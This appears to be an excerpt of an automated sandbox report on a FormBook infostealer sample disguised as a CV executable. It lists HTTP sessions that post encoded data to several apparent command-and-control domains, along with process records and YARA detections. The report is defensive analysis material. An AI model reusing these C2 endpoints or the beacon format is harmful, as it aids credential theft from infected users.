                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                72 | 192.168.11.20 | 49823 | 192.64.118.221 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:05:48.564104080 CET | 1289 | OUT | POST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeO+Q6yS594l44H5HU15wbhN6MMTGrCaHXJStrzqaSb28GWCB+RwXlGmeRXflTicdTib2B+6HLdajm/scMOKkjAm+e+GbYx5JxuJuyWwq7IN40/C67XFeCo45/PRbG2qEmPbfL1dCK0/Gu/W80IrWprJ5o4f/GzEXQ5VKI0HSvyj4V5shrIr9ej/58UNwBuDgxYqplDUAtcxtynx2/Mz4F0lhm13mZFnMEjPQCZOf9Ydjw/kewWg49h/7exTH23PtdNA8I847Gl7/pqXKnh3SujiDl1wbIcxyFh0iFm+CjNk491sIf3TA6RCeuKupf+kq/tT3rKqWxJvci8p/w/RQfxBVrRciFJXOS/lWL1t3CNnOAN46ihy41+J6ORfO7KOq0+BRlwMIn58qYG55lcMVTv3edAm+FlH9QX6+guNUxeqjPDZaDKcQen+q+eDyhCwIBR79bT1UNXUNFFNc/0mGctRJTrO+EDtGAVCtIWSjIqlTu+p8cCw1c6LpFHoeE+nHUtSNkCWgy2owK9HqG0DDY1zveBIgztUF4Nq8aOPGDcg0Ol/MPRJWrqTLiWO36WIPL9p4afJ7bNT8iBv1yEKUyyE0y3sLVN2+z6qoV13ZC5yHmFDLgcSmFQwYbMGKkg01BMYeoM2r4qdSswjjb50Qu+8mG82qQHbW3LTK8wsSxmOSBGE8Le
                                                                                                Nov 11, 2024 17:05:48.564162016 CET | 6633 | OUT |
                                                                                                Data Ascii: Hkk9ktZNxVwlWgF/Qcp8kEHnSHFXxErrD76R6MGfOK+J/hHfNW0RfGUTp91jezxJsxh61pB/X9Co2F/eZdcoDIjbTeKIdhbiMszcqmag9FWBZMbPFOgA/loCYxBzw0/1VSM0Np9Ag9l9OpPnxzOLmuTuILNkq52nccpdW9ksJ/E37QRaX4qgJC0sgLhu+SoVdWF4jdCIz4gcybNk4+pCAks877uMwHv2vlp3qkAWJXbd76vQJqB
                                                                                                Nov 11, 2024 17:05:48.873466015 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:48 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                73 | 192.168.11.20 | 49824 | 192.64.118.221 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:05:51.387305021 CET | 495 | OUT | GET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:05:51.694986105 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:51 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                74 | 192.168.11.20 | 49825 | 154.23.184.95 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:05:57.039556026 CET | 747 | OUT | POST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqwDu2imPoSg77yaJW7Zo1PubxI3L5zJiDjDiaDxO5Z46dOwYhZJz7H300b2B+l+a26ji6wd2AaG+58XDavUSs9Vay6BMD07bFEgrNbjYuGL45+PdtF/OVpNEmUzKAfVLDoiCqbzDGN5YeUDDFG7oF4q7hUwdkiMogGJdtGpNXT/rEcRSokCS5dQ==
                                                                                                Nov 11, 2024 17:05:57.371517897 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:57 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                75 | 192.168.11.20 | 49826 | 154.23.184.95 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:05:59.893410921 CET | 767 | OUT | POST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqyj+2lB7oDw783aJWx5pyPunxIyyizcKDjhqaC1a5Qo6dWgYodJzGH34ab39+l+e26iy6wqqDaW+nw3DYh0Ss9Vay6BZU07zFHQ7NYHMtFL42zfdtB/OZpNE+UyGqfTPDoiSqbBrHH5YYajCuK40I0I7MTCc57/8/DfQ3bb5zQs32YhrAmATiAVMf7CDRTKoGlaTqP+PVOmk=
                                                                                                Nov 11, 2024 17:06:00.220974922 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:06:00 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                76 | 192.168.11.20 | 49827 | 154.23.184.95 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:06:03.116106987 CET | 2578 | OUT | POST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:06:03.116182089 CET | 5338 | OUT |
                                                                                                Data Ascii: jB2e7LulkZpoTDi2ZJjbV59uks29SpEg9DUfsI9bplMuQ4T5R0rHcRemJlwEe7EJqPjDnFzPc1NW+Ej2MTrL5nd9HPEk1kqnKuqWW3PplWnCUvfSSl5u0LeCk263HsSnyJc9NMBURclnOA/WHf9oEPtY/QUWyKvXifW5VENZnyVpudzSJlX+0aWRkGjtUd7fi7pK9DJQFHMzzRR8JrbkPrkiTNgXsm6J0lDm/Xq+YgJO8yWzNwm
                                                                                                Nov 11, 2024 17:06:03.449050903 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:06:03 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                77 | 192.168.11.20 | 49828 | 154.23.184.95 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:06:05.956892967 CET | 493 | OUT | GET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:06:06.273411989 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:06:06 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                78 | 192.168.11.20 | 49829 | 13.248.169.48 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:06:11.433247089 CET | 765 | OUT | POST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoTotfDct9fWgWLwsCJlL2YmgEQ6Jr0fgXccd3mKUgP96q/8a4RfuFEnOHVliDCrsoJ/2lBM88Y2N6HJSlQj/c7nUcZpBgmTIC+tDJrxgWSuCJykVREcprmtAX7BaebD8SO1nUGMmzgvGSYLudk2tnHLLOSHAxQ9J1yoB50gcJTxcgIyY/7Yissfg==


Session ID: 79 | Source IP: 192.168.11.20 | Source Port: 49830 | Destination IP: 13.248.169.48 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:14.106084108 CET | Bytes transferred: 785 | Direction: OUT | Data:
POST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoToNPDdM9fRAWIu8CJrr3wmgIQ6MbkfTjcSZnmLVgP+6q/364QQOFPnODnlj/CrssJ/09BNN8Hs96FdilS+Pc7nUcZpBccTJq+tSZrwEKVwSJx0FRELZritAXJBbS1D+aO1mkGN0bn4WSePud2weSxQpG8NHVQkrNupX0u9u93yP862oGTagt3Cl7ebd2BPzWV+SOd+GMOIMk=


Session ID: 80 | Source IP: 192.168.11.20 | Source Port: 49831 | Destination IP: 13.248.169.48 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:16.776108027 CET | Bytes transferred: 6445 | Direction: OUT | Data:
POST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Timestamp: Nov 11, 2024 17:06:16.776196957 CET | Bytes transferred: 1489 | Direction: OUT | Data:
                                                                                                Data Ascii: 90Nx6suzCID12ITeqP1vdWjoV4/6HtMPC+p8tdgmAY43cq49viBo0BAqAK7XBZp6m1bYzQpSHxZJv1qJwept1Ll59geKJb2Lmaiey7nxG4xXaC+KSzovzJFQ8Fs21bYIXxqetBcQtoA5UMPvkhodAGAXdhGxjoSw10+dfpngjzlvQvw7Nzar5ADfE7p7h+/S1/fDc4aoTt4tA+6gORU9blCiVYR190Uf55MEhaEkpqFqUtWYa+z


Session ID: 81 | Source IP: 192.168.11.20 | Source Port: 49832 | Destination IP: 13.248.169.48 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:19.444283009 CET | Bytes transferred: 499 | Direction: OUT | Data:
GET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Timestamp: Nov 11, 2024 17:06:19.588090897 CET | Bytes transferred: 400 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:06:19 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


Session ID: 82 | Source IP: 192.168.11.20 | Source Port: 49833 | Destination IP: 3.33.130.190 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:24.725188971 CET | Bytes transferred: 777 | Direction: OUT | Data:
POST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnXn+QxJz2rVNqYn30pG0xsers+WSh5S5zxs3StisS974y5W0wUASEZCGEHjRcqVf2w06XkUX9bv013evQHOp0QS82b+yWIaBVHGEev3YVoLuQiEDUCXFS0Uace5ykzRY/WO1EYCSv981EC8rYXbmb5uadab857ZogywOCAo070JM4+Kkug04CTQ==


Session ID: 83 | Source IP: 192.168.11.20 | Source Port: 49834 | Destination IP: 3.33.130.190 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:27.399358034 CET | Bytes transferred: 797 | Direction: OUT | Data:
POST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnWGOQzqb26lNpBX30gm01sevs+U+x5gdzxMHSumYS0r4ygm1bbgSfZCKqHnNcqR32w1KXknP+a/0zvuvSJup0QS82b4fzIbpVH20evWYS37uTyUDUTHFW0Uaye4vBzSg/WMdEZQ6s381GMcqIUJLXhta6coUQicw9zmDYdaAf3aQK66dGi25ZOZop8tP3u6/OTPCMcrkdwsM=


Session ID: 84 | Source IP: 192.168.11.20 | Source Port: 49835 | Destination IP: 3.33.130.190 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:30.052366972 CET | Bytes transferred: 1289 | Direction: OUT | Data:
POST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Timestamp: Nov 11, 2024 17:06:30.052416086 CET | Bytes transferred: 3867 | Direction: OUT | Data:
                                                                                                Data Ascii: wp0gaH6wzA1ZcDBPRgnhGx8fP/DF5gQzLnUv9kQpdUDTWFcx/FURNKOtbfflTTkPtKXlNfeWO4+0lSy+K/YIt4R8IqRts+omMG8LfGVICijT9Sjw9nzGveshZN8ukm2+kNVjAQ8BMo26Ysacpa0YNmQ0VmYWgj+oMWrCadlKtuLOzZZHSs1m9U4DqUVtChPom0Rj4ahasovGuAlx5ctE4TOEDrpXDUa8JT0wxOiBR+M1erFd+Mo
Timestamp: Nov 11, 2024 17:06:30.052464962 CET | Bytes transferred: 2790 | Direction: OUT | Data:
                                                                                                Data Ascii: +ivjzpDyk/jNaPRQnF2EgDk46cFtWMHBOEhZGoUCBnckhNupClTVqrbEnTl07yQCugbb/1jP/uEhPlgX2MT9ukmoyd7l7uQskX+z1We3f8Du65Orw6wm2ETiO8Mfuawu2QIKqmBRrfl1nmGyr+VRybV6jEaRJTLDvhHduUfB3TL6FPKbNL8ijSiLPid+7Q59I+PLDIgGyFBZZvb/pkV/s3lwOFEXe39poQYzyPvmGIbTCqo8hp2


Session ID: 85 | Source IP: 192.168.11.20 | Source Port: 49836 | Destination IP: 3.33.130.190 | Destination Port: 80
Timestamp: Nov 11, 2024 17:06:32.724288940 CET | Bytes transferred: 503 | Direction: OUT | Data:
GET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Timestamp: Nov 11, 2024 17:06:32.860625982 CET | Bytes transferred: 400 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:06:32 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU="}</script></head></html>


                                                                                                Target ID:0
                                                                                                Start time:10:57:31
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                                                                                                Imagebase:0xdf0000
                                                                                                File size:747'008 bytes
                                                                                                MD5 hash:DE148DC1610A111AF0B004E4D0D851A4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:10:57:46
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                                                                                                Imagebase:0x490000
                                                                                                File size:747'008 bytes
                                                                                                MD5 hash:DE148DC1610A111AF0B004E4D0D851A4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:11:00:37
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe"
                                                                                                Imagebase:0xa80000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:4
                                                                                                Start time:11:00:39
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                                Imagebase:0x490000
                                                                                                File size:22'016 bytes
                                                                                                MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                Target ID:5
                                                                                                Start time:11:00:52
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Wow64 process (32bit):true
